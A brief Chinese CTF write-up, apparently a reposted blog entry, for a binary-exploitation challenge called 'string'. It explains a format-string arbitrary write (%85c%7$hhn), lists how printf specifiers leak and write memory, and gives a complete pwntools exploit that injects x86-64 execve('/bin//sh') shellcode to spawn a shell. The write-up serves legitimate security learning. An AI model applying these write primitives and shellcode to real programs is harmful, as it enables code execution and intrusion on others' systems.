本文共 1742 字，大约阅读时间需要 5 分钟。

[fmt+shellcode]string

1. ida分析

1. main函数分析

   

2. 看函数执行流程

   

• 通过

  aaaa.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p得到format的偏移,再v2在format上面一个字节,就得到的v2的偏移

  

• 再通过任意写

  %85c%7$hhn 将85写到v2的最低位的字节

  1. %c：输出字符，配上%n可用于向指定地址写数据。
  2. %d：输出十进制整数，配上%n可用于向指定地址写数据。
  3. %x：输出16进制数据，如%i$x表示要泄漏偏移i处4字节长的16进制数据，$lx表示要泄漏偏移i处8字节长的16进制数据，32bit和64bit环境下一样。
  4. %p：输出16进制数据，与%x基本一样，只是附加了前缀0x，在32bit下输出4字节，在64bit下输出8字节，可通过输出字节的长度来判断目标环境是32bit还是64bit。
  5. %s：输出的内容是字符串，即将偏移处指针指向的字符串输出，如%i$s表示输出偏移i处地址所指向的字符串，在32bit和64bit环境下一样，可用于读取GOT表等信息。
  6. %n：将%n之前printf已经打印的字符个数赋值给偏移处指针所指向的地址位置，如%100x%10$n表示将0x64写入偏移10处保存的指针所指向的地址（4字节），而$hn表示写入的地址空间为2字节，%$hhn表示写入的地址空间为1字节，$lln表示写入的地址空间为8字节，在32bit和64bit环境下一样。有时，直接写4字节会导致程序崩溃或等候时间过长，可以通过%$hn或$hhn来适时调整。

3. shellcode得以执行

   

2. 思路

• ida分析过程中已解决

3. exp

from pwn import *#p = remote()p = process('./string')elf = ELF('./string')context.arch = elf.archp.recvuntil('secret[0] is ')addr1 = int(p.recvuntil('\n')[:-1],16)log.success('addr1==>'+hex(addr1))p.recvuntil('secret[1] is ')addr2 = int(p.recv(7),16)log.success('addr2==>'+hex(addr2))context.log_level = 'debug'p.sendlineafter('What should your character\'s name be:','huzai')p.sendlineafter('So, where you will go?east or up?:\n','east')p.sendlineafter('go into there(1), or leave(0)?:\n','1')p.sendlineafter('\'Give me an address\'\n',str(addr1))p.sendlineafter('And, you wish is:\n','%85c%7$hhn')shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"p.sendline(shellcode)#pwtools shellcode#p.sendline(asm(shellcraft.sh()))gdb.attach(p)p.interactive()

转载地址：http://qtugf.baihongyu.com/